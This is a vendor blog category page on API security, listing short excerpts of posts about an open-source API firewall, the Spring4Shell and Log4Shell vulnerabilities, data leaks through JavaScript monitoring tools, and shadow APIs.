Category

API Security

Category

Discovering and securing any API is one of the most difficult challenges for developers. The API security landscape is constantly evolving, with new threats and vulnerabilities emerging at a rapid pace. Since commercial API security solutions could be really expensive for organizations, it’s never worst to have a look at open-source alternatives. The OSS API Firewall is the pioneer in this space with more than 1 billion docker pulls after the first release in October…

Quick update There are two vulnerabilities: one 0-day in Spring Core which is named Spring4Shell (very severe, exploited in the wild no CVE yet) and another one in Spring Cloud Function (less severe, CVE-2022-22963) Wallarm has rolled out the update to detect and mitigate both vulnerabilities No additional actions are required from the customers when using Wallarm in blocking mode When working in a monitoring mode, consider creating a virtual patch Spring4Shell Spring Framework is…

This is the largest vulnerability we have seen in years. You may still be vulnerable even if your project is not based on Java. Many tech stacks are vulnerable because so many tools use the Log4js including infrastructure, dev-tools, and CI/CD products. Log4Shell will be here for a while. Log4j is a basic core component that is already in use in many products, including network devices, management consoles, and enterprise software and hardware. They just…

Wallarm has rolled out the update to detect and mitigate CVE-2021-44228. No additional actions are required from the customers Attempts at exploitation will be automatically blocked in a blocking mode When working in a monitoring mode, consider creating a virtual patch Log4Shell A 0-day exploit in the Java core library log4j was discovered that results in Remote Code Execution (RCE) by simple 1-line exploit with JNDI URL. Given how ubiquitous this library is, the impact…

We all know how it’s convenient to use tools like Sentry or Datadogs for JavaScript events monitoring. It allows to catch errors in real-time, organize and manage issues resolution process, and genuinely shift left operations to developers. But Wallarm security experts warn of dangerous patterns to use such tools integrated into UI since it can cause private data-stealing from authenticated users in an almost invisible way. This article will explain how it could happen and…

Shadow APIs can be defined as active endpoints that you are not aware of. Some APIs are deployed but never documented. Others are services that don’t have an owner anymore. Some are even old v2 versions that have been deprecated for years, yet still exposed. Long story short: these APIs are not documented and not in the API catalog. Yet, they pose a real threat as they can be vulnerable. What we see as a trend…